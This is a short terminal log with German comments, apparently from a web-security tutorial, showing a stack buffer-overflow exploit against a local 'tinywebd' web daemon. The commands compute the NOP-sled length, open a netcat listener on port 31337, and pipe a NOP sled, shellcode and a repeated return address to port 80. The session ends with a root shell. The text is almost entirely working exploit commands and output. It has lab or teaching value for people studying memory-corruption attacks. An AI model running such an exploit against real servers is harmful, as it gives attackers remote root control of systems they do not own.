root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# wc -c loopback_shell
83 loopback_shell
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# echo $((524+4 - (32*4) - 83))
317 Dieser Werte wird übernommen. Jetzt arbeitet ihr mit 317 weiter
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -l -p 31337 &
[1] 2303
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# jobs
[1]+  Läuft                  nc -l -p 31337 &
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# (perl -e 'print "\x90"x317'; cat loopback_shell; perl -e 'print "\x24\xf5\xff\xbf"x32 . "\r\n"') | nc -w 1 -v 127.0.0.1 80
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
nc -l -p 31337
whoami
root

   

Websicherheit...  

   
© ALLROUNDER